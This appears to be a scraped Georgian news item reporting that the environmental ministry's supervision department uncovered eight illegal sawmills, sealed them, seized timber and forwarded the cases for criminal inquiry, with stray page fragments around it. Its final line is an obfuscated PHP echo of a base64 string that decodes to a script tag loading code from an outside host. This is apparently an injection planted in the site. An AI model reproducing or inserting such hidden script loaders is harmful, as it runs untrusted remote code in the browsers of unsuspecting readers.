celsiusi
ავერსი საქკაბელი
გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს გარემოსდაცვითი ზედამხედველობის დეპარტამენტის თანამშრომლებმა, უკანონო ტყითსარგებლობასთან ბრძოლის ფარგლებში, 8 უკანონო სახერხი საამქრო გამოავლინეს.
უწყების მიერ გავრცელებული პრესრელიზით, 5 ლენტური და 3 ცირკული არარეგისტრირებული სახერხი საამქრო მოქალაქეებს კახეთში, შიდა ქართლში, იმერეთში, სამეგრელოსა და აჭარაში, ასევე, დედაქალაქში საცხოვრებელი სახლების ეზოებში ჰქონდათ მოწყობილი.
"2 უკანონო სახერხი საამქროა დალუქული ხარაგაულის მუნიციპალიტეტის სოფელ სარგვეში, 2 - ხობის მუნიციპალიტეტის სოფლებში: შუა ხორგასა და ქვემო ქვალონში; თითო-თითო ფაქტი დაფიქსირდა ახმეტის მუნიციპალიტეტის სოფელ ქისტაურში, ხაშურის მუნიციპალიტეტის სოფელ ტეზერში, ქალაქ ქობულეთსა და თბილისში (გლდანი).
უკანონო სახერხი საამქროების ტერიტორიებიდან ამოღებულია სხვადასხვა სახეობის, ჯამში, 32 ერთეული დაუფირნიშებელი მრგვალი ხე-ტყე (მორი), 18 ერთეული კოტრი, 7 ერთეული და 6,5 კუბურ მეტრამდე მოცულობის ხე-ტყის გადამუშავების პროდუქტი (ფიცარი, ძელაკი, ფრიზა, ე.წ. ნაგვერდული).
ვინაიდან ფაქტები შეიცავს სისხლის სამართლის დანაშაულის ნიშნებს, მასალები, შემდგომი რეაგირების მიზნით, შესაბამის უწყებებში გადაიგზავნა", - ნათქვამია დეპარტამენტის ინფორმაციაში.
488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");